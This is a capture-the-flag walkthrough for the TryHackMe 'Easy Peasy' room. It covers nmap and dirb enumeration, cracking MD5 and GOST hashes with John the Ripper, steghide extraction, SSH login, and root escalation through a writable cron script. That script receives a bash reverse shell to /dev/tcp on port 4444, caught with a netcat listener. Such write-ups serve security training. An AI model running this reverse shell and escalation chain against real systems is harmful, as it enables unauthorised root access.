THM — Easy Peasy
Notes on THM Room
Enumeration through nmap
nmap -p- -A 10.10.107.122
How many ports are open?
3 — Port 80, 6498, 65534
What is the version of nginx?
What is running on the highest port?
Compromising the Machine
Using GoBuster, find flag 1.
By The Dark Raver
-----------------START_TIME: Thu Sep 23 20:40:33 2021
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612---- Scanning URL: http://10.10.107.122/ ----
==> DIRECTORY: http://10.10.107.122/hidden/
+ http://10.10.107.122/index.html (CODE:200|SIZE:612)
+ http://10.10.107.122/robots.txt (CODE:200|SIZE:43)
---- Entering directory: http://10.10.107.122/hidden/ ----
+ http://10.10.107.122/hidden/index.html (CODE:200|SIZE:390)
==> DIRECTORY: http://10.10.107.122/hidden/whatever/
---- Entering directory: http://10.10.107.122/hidden/whatever/ ----
+ http://10.10.107.122/hidden/whatever/index.html (CODE:200|SIZE:435)
END_TIME: Thu Sep 23 20:40:40 2021
DOWNLOADED: 13836 - FOUND: 4
Heading to the path /hidden/whatever we find an image with the title dead end. Using inspector on Firefox we can read the source code. Within the code there is a hidden string inside enclosed in <p> tags. Once we decode with Base64 we find our first flag.
Further enumerate the machine, what is flag 2?
Since we didnt find anymore interesting information on port 80 we moved onto port 65524 (We could attempt to bruteforce SSH but lets keep looking for more info). Cracking the MD5 hash gives ue the flag for the second question
Crack the hash with easypeasy.txt, What is the flag 3?
We find the third flag in the default file for the Apache webserver. We then crack the hash which we find out is MD5.
What is the hidden directory?
Within the source code for the Apache homepage we another hidden message. This message states that the given text is encoded in a ba… My guesses include base 64, which we then use CyberChef to find the hidden directory.
Using the wordlist that provided to you in this task crack the hash
what is the password?
The hint tells us that the hash is encrypted by Gost. We can use JohnTheRipper to crack the hash.
john --format=gost --wordlist=/root/Desktop/easypeasy.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gost, GOST R 34.11-94 [64/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1g 0:00:00:00 DONE (2021-09-23 22:08) 50.00g/s 384000p/s 384000c/s 384000C/s mypasswordforthatjob
Use the "--show" option to display all of the cracked passwords reliably
What is the password to login to the machine via SSH?
Before moving on to the SSH port, we first download the image located in the directory. We then use steghide to see if there is anything hidden within the file. We use the previous password to unlock a secret text. We find the username and password (in binary) to the SHH login.
steghide extract -sf image.jpg
wrote extracted data to "secrettext.txt".
root@ip-10-10-32-53:~/Desktop# cat secrettext.txt
01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001iconvertedmypasswordtobinary
What is the user flag?
Logging into the ssh server, we find a file called user.txt. Since the message says it has been rotated we can try d.code to find the right rotation. We try ROT-13 and we get the flag.
boring@kral4-PC:~$ cat user.txt
User Flag But It Seems Wrong Like It`s Rotated Or Something
What is the root flag?
To get the root flag we have to escalate our privileges. For this situation we use linpeas which is a great tool to figure out how to escalate. We first use the secure copy command to transfer over the .sh file.
scp -P 6498 linpeas.sh email@example.com:/tmp/
Once file is copied over we run linpeas and we find an interesting file named mysecretcronjob.
Opening the file we see that it is a bash file and since we can edit it, we can insert our own reverse shell which we can connect to with a listener. You can find good reverse shells on PenTest Monkey.
boring@kral4-PC:/var/www$ cat .mysecretcronjob.sh
# i will run as root
bash -i >& /dev/tcp/**.**.**.**/4444 0>&1
On our own computer we set up a listener
nc -lvnp 4444
Once we run our command were able to gain root and find the flag.